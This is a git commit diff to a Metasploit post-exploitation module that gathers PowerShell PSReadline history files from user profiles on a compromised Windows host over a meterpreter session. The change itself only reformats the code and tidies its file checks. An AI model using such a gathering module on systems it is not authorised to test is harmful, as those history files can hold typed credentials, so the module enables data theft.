Minor changes for psreadline_history

2019-02-13 12:38:36 -06:00 · 2019-02-13 12:38:36 -06:00 · 366d060b5d
parent b7dce68fc4
commit 366d060b5d
1 changed files with 19 additions and 19 deletions
--- a/modules/post/windows/gather/psreadline_history.rb
+++ b/modules/post/windows/gather/psreadline_history.rb
@ -6,35 +6,35 @@
 require 'msf/core/post/windows/user_profiles'

 class MetasploitModule < Msf::Post
+
  include Msf::Post::File
  include Msf::Post::Windows::UserProfiles

  def initialize(info={})
    super(update_info(info,
-        'Name' => 'Windows Gather PSReadline history',
-        'Description' => %q{
-          Gathers Power Shell history data from the target machine.
-        },
-        'License' => MSF_LICENSE,
-        'Author' => [
-          'Garvit Dewan <d.garvit[at]gmail.com>' # @dgarvit
-        ],
-        'Platform' => %w{ win },
-        'SessionTypes' => [ 'meterpreter' ],
-        'References'   => [
-          ['URL', 'https://docs.microsoft.com/en-us/powershell/module/psreadline/'],
-          ['URL', 'https://github.com/KalibRx/PoshHarvestPy/blob/master/poshharvest.py'],
-          ['URL', 'https://0xdf.gitlab.io/2018/11/08/powershell-history-file.html']
-        ]
-      ))
+      'Name'        => 'Windows Gather PSReadline History',
+      'Description' => %q{
+        Gathers Power Shell history data from the target machine.
+      },
+      'License' => MSF_LICENSE,
+      'Author' => [
+        'Garvit Dewan <d.garvit[at]gmail.com>' # @dgarvit
+      ],
+      'Platform' => %w{ win },
+      'SessionTypes' => [ 'meterpreter' ],
+      'References'   => [
+        ['URL', 'https://docs.microsoft.com/en-us/powershell/module/psreadline/'],
+        ['URL', 'https://github.com/KalibRx/PoshHarvestPy/blob/master/poshharvest.py'],
+        ['URL', 'https://0xdf.gitlab.io/2018/11/08/powershell-history-file.html']
+      ]
+    ))
  end

  def run
    grab_user_profiles.each do |userprofile|
-      next if userprofile['AppData'] == nil
+      next if userprofile['AppData'].blank?
      history_path = userprofile['AppData'] + "\\Microsoft\\Windows\\PowerShell\\PSReadline\\ConsoleHost_history.txt"
-      stat = session.fs.file.stat(history_path) rescue nil
-      next if stat.nil?
+      next unless file?(history_path)
      gather_psreadline_history(userprofile['UserName'], history_path)
    end
  end